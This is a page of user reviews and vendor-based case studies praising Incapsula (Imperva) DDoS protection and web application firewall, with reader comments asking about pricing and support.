- Intelligent mitigation of sophisticated application layer attacks - Incapsula uses advanced traffic analysis algorithms, granular mitigation rules and an enterprise-grade WAF to differentiate legitimate website visitors (humans, search engines, etc.) from automated or malicious clients.
- Transparent mitigation with less than 0.1% False Positives - Incapsula applies a set of progressive and non-intrusive challenges that are designed to ensure the optimal balance between strong DDoS protection and an uninterrupted user experience, without the need for annoying delay and CAPTCHA screens.
- "Always on" DDoS protection - Automatic "always on" DDoS mitigation and 24x7 monitoring are effective in stopping "hit & run" DDoS attacks that can wreak havoc with solutions that need to be manually turned on and off on every burst.
- Cloud-based mitigation of network DDoS attacks - Incapsula mitigates high-volume network attacks through a global network of multi-gigabyte scrubbing centers.
- Dedicated NOC team – An experienced team of Network Operations Center (SOC) engineers performs 24x7 security monitoring and assists with DDoS mitigation as needed.
Since activating Incapsula on our sites, we have solved our DDoS problem and couldn't be more pleased with our overall website performance and security. Equally important, Incapsula's technical support and commercial teams have been very responsive throughout the initial rollout phase.
Disclosure: PeerSpot has made contact with the reviewer to validate that the person is a real user. The information in the posting is based upon a vendor-supplied case study, but the reviewer has confirmed the content's accuracy.
Nice and informative information. Could you share your customer service experience for the product Incapsula regarding license renewal and for critical DDOS incidents?
CEO with 51-200 employees
We have gone through paid evaluations of several DDoS mitigation services, but all of them failed to block DDOS attacks
Our company has recently reached 3.5 million registered users and 200,000 hosted websites. Daily DDoS attacks on our platform resulted in unnecessary and prolonged downtime for the thousands of sites on our network. These attacks included network level (layer 3 & 4) attacks ranging from 2Gbps to 10Gbps with various attack vectors such as UDP attacks but most commonly SYN floods which exploit the TCP three-way handshake to consume the server’s connection resources. The more challenging attacks were the diverse application level (Layer 7) attacks. These attacks seem as if they are originating from legitimate sources, try to mimic human behavior and consume the backend computing resources of the website.
We were seeing daily DDOS attacks, sometimes multiple DDOS attacks in parallel on various client websites. Since our company is a global hosted community platform and social network, everyone was affected at the same time. We needed to make sure that no attack on any one website could bring other websites down. We have gone through paid evaluations of several DDoS Mitigation services, but all of them failed to block DDOS attacks automatically without serious side effects, such as blocking legitimate visitors.
Once we decided to evaluate Incapsula's Cloud-Based DoS protection, Incapsula's team quickly helped us to setup a few of our websites on the service.
Once we joined Incapsula, they immediately identified that our network was under various types of attacks at almost any given time, both network and application level attacks.
While the network based attacks were absorbed by Incapsula’s backbone, the application layer attacks were very diverse. Incapsula relied very heavily on their bot detection and progressive DDoS challenge technology, to block 100% of attackers transparently, without incurring any noticeable effect to almost all of the real users.
Maintaining the best possible customer experience was a key consideration for us. It was very apparent why other DDoS protection services that involve delays, CAPTCHAs and other side effects on visitors would not work for us. Also, a DDoS solution that isn't fully automated would keep our team constantly busy enabling/disabling the protection service.
Incapsula’s ability to allow human and legitimate bot traffic to access the website with no interruption, while filtering network and application level DDoS traffic, allowed us to put our DDoS problems behind us and focus on what we do best, which is building a great platform for the online gamers community.
Incapsula is now a critical component of our security infrastructure. All traffic to our network and hosted websites passes through Incapsula for screening. Malicious traffic and DDOS attacks are blocked automatically.
We take advantage of Incapsula's DDoS Protection key benefits, to secure our online properties:
- Protection against Network and Application Level Attacks - Through a worldwide network of multi-gigabit scrubbing centers and unique bot (automation) detection technology, Incapsula provides complete protection for both network (Layer 3 & 4) and application level (Layer 7) DDoS attacks.
- 24x7 Managed Security Service - Incapsula’s DDoS security team monitors attacks and is available on-demand before, during or after attacks to ensure that our sites are up and running and performing.
- Zero Business Disruption - Incapsula’s CDN and bot detection technology ensure that even under attack, our website traffic is accelerated and legitimate visitors are not delayed or denied access to our sites.
Our network was finally clear from the endless onslaught of crippling UDP & SYN flood attacks that we had been experiencing. Using Incapsula's dashboard, we were able to see exactly when each attack was happening, and continue delivering service to millions of users during the attack. We also saw a sharp drop in unwanted bot activity, which resulted in a 20% drop in load on our servers. A key feature we were looking for is a very low false positive rate during mitigation. Incapsula proved to have a near zero false positive rate, and legitimate users had no trouble accessing our websites during prolonged DDOS attacks.
Disclosure: PeerSpot has made contact with the reviewer to validate that the person is a real user. The information in the posting is based upon a vendor-supplied case study, but the reviewer has confirmed the content's accuracy.
Incapsula helped us mitigate 80GB/s multilayered DDoS attacks and nearly immunized us completely against network layer attacks. They also stopped attacks that didn't have names within hours. I can't say there is never downtime, but that's the case with any serious denial of service... but in the hundreds of thousands of dollars my clients spent on live testing DDoS firewalls, Incapsula's team, system and interface were simply the best.
Senior Cyber Security Specialist Architect at a tech consulting company with 11-50 employees
Provides out-of-the-box security for web applications
Pros and Cons
- "There is a quick switch between any of the nodes if something goes wrong, where there's an attack against a specific area. The security setup is reasonably easy. It's not a problem to do setups and rules and integrations. And, yeah, the back end team is also very willing to assist if there are questions that we cannot answer or questions that we do have"
- "The UI interface needs improvement."
What is our primary use case?
The solution is being used for communication.
What is most valuable?
If something goes wrong, there is a quick switch between nodes, wherever there's an attack against a specific area. The security setup is reasonably easy. It's easy to do setups, rules, and integrations. The backend team is also willing to help if there are questions that we cannot answer.
What needs improvement?
The UI interface needs improvement.
For how long have I used the solution?
I have been using Imperva Web Application Firewall for six months.
What do I think about the stability of the solution?
The solution is highly stable. I rate the stability a ten out of ten.
What do I think about the scalability of the solution?
It is a scalable solution. I would rate it a nine out of ten.
How was the initial setup?
The initial setup is easy. The deployment depends on the customer's solution but does not take more than a few hours. I rate the initial setup an eight out of ten.
What's my experience with pricing, setup cost, and licensing?
It is a very affordable solution.
What other advice do I have?
I would definitely recommend the solution. I rate the solution an eight out of ten.
Which deployment model are you using for this solution?
Public Cloud
Disclosure: My company has a business relationship with this vendor other than being a customer. Partner
Updated: September 2025
Thanks for sharing your personal experience. Would you please tell us how much Incapsula’s enterprise plan cost you?